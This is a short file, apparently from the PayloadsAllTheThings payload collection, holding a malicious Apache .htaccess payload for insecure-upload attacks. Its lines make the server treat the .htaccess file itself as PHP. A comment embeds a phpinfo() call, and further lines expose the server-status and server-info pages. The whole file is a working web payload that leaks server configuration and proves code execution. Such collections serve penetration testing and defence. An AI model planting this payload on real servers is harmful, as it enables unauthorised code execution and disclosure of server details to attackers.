PayloadsAllTheThings/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo
2020-09-27 11:16:50 +02:00

5 lines
113 B
Text

AddType application/x-httpd-php .htaccess
# <?php phpinfo(); ?>
SetHandler server-status
SetHandler server-info